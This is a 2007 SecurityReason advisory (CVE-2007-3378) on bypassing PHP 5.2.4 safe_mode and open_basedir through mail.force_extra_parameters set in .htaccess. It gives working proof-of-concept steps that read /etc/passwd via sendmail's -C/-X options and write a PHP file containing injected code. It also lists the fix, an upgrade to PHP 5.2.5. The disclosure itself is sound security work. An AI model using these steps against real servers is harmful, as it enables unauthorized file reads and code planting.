SecurityReason.com - PHP 5.2.4 mail.force_extra_parameters unsecure ( Research Advisory )

Advisory Text :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.4 mail.force_extra_parameters unsecure ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- - Written: 06.09.2007
- - Public: 0x.0x.2007

SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.
When using PHP as an Apache module, you can also change the configuration
settings using directives in Apache configuration files (e.g. httpd.conf)
and .htaccess files. You will need "AllowOverride Options" or
"AllowOverride All" privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set
value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see below)
should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only with
PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified
parameters to be passed as extra parameters to the sendmail binary. These
parameters will always replace the value of the 5th parameter to mail(),
even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. htaccess safemode and open_basedir Bypass Vulnerability per
mail.force_extra_parameters ---

We have recrived a lot of question about news
http://securityreason.com/news/0/0x1f . And we will show How to exploit
this issue. When using PHP as an Apache module, you can also change the
configuration settings using directives in .htaccess file. But it is
possible to bypass a safe_mode or open_basedir per
mail.force_extra_parameters. In a lot of servers is sendmail, can be also
exim etc. But we show how to exploit this for a famous mail server
(SENDMAIL).

For example you can set mail.force_extra_parameters via .htaccess.

cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2
PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 and PHP 5.2.4. Let's see folder "/narkotyk" in localhost:82.

cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
- -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
- -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
- -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php
<? include("/etc/passwd"); ?>

cxib# curl http://localhost:82/narkotyk/file1.php
 
Warning: include() [<a
href='function.include'>function.include</a>]: SAFE MODE Restriction in
effect. The script whose uid is 80 is not allowed to access /etc/passwd
owned by uid 0 in /usr/local/www/apache22/data/narkotyk/file1.php on
line 1 
 
Warning: include(/etc/passwd) [<a
href='function.include'>function.include</a>]: failed to open stream:
Invalid argument in /usr/local/www/apache22/data/narkotyk/file1.php
on line 1 
 
Warning: include() [<a
href='function.include'>function.include</a>]: Failed opening '/etc/passwd'
for inclusion (include_path='.:') in
/usr/local/www/apache22/data/narkotyk/file1.php on line 1 

so safe_mode is open.
Let's see files .htaccess and file2.php

cxib# cat file2.php
<? var_dump(mail("root@localhost", "hallo", "root")); ?>
cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X
/usr/local/www/apache22/data/narkotyk/result.txt'

and let's send request to file2.php

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

False!? No

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
- -rw-r--r-- 1 www www 7130 Sep 7 00:31
/usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created.

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration line
"root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line
"toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.

We can read file and safe_mode and open_basedir is bypassed.

It is possible create file with php code. But we need have sendmail.cf to
send email.

Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C
/usr/local/www/apache22/data/narkotyk/sendmail.cf -X
/usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
<? var_dump(mail("root@xxxxxxxxxxxxxxxxxx", "h<? phpinfo(); ?>allo",
"root")); ?>

We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf and
configure this file. Then

cxib# curl http://localhost:82/narkotyk/file3.php
bool(true)
cxib#
cxib# cat phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<? phpinfo(); ?>allo
69755 <<<
69755 <<< root
69755 <<< [EOF]
69757 === CONNECT securityreason.pl
... etc

and now

cxib# curl http://localhost:82/narkotyk/phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;}
... phpinfo().

This was example for php 5.2.4 with sendmail. But we think, it is possible
exploit exim and more send mail programs. In PHP 5.2.4
mail.force_extra_parameters is filtered per php_escape_shell_cmd(). But we
needn't bypass this function.

- --- mail.c ---
if (force_extra_parameters) {
extra_cmd = php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd = php_escape_shell_cmd(extra_cmd);
}
- --- mail.c ---

Interesting is:

- --- mail.c ---
if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in
effect. The fifth parameter is disabled in SAFE MODE.");
RETURN_FALSE;
}
- --- mail.c ---

5 th parameter in mail() function is checked. mail.force_extra_parameters
no.

Before public advisory we tested issue and we send advisory to PHP Team.
Main problem is that, we do not recived any answer.
We do not checked patch to CVE-2007-3378 (SREASONRES:20070627), but we are
using CVE-2007-3378 to identification .

http://securityreason.com/achievement_securityalert/47

php_escape_shell_cmd() is not reason for CVE-2007-3378.

- --- 2. Exploit ---
SecurityReason will not public official exploit for this issue.

Anybody can self exploit this.

- --- 3. How to fix ---

- --- note from SREASONRES:20070627 ---
This bug has been founded on February 2007
We contacted with PHP Team again.
With co-operation Stanislav Malyshev from PHP Team the PHP 5.2.5 is now
fully patched against "mail.force_extra_parameters" issue .
- --- note from SREASONRES:20070627 ---

Update to PHP5.2.5

- --- 4. Greets ---

For: sp3x, Infospec, p_e_a, l5x and Stefan Esser

- --- 5. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)

iD8DBQFHSZ1w3Ke13X/fTO4RAnKnAJ0drPZhrdtiheaR9b8mLZ0IjyJoIQCfZC3A
jn8i1L2eCHVS1jBuN24ySc0=
=ZCW0
-----END PGP SIGNATURE-----

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason